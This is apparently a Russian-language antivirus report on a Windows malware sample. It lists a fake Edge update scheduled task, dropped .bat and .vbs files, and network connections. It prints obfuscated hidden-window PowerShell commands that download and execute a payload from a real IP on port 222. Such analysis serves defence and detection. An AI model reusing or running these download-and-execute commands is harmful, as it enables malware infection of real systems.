Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\micros oftedgeupdate
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\ccoe.bat
- C:\users\public\ccoe.vbs
Сетевая активность
Подключается к
- '95.##4.27.64':222
TCP
Запросы HTTP GET
- http://95.###.27.64:222/cod.jpg via 95.##4.27.64
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','AD...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','AD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];...
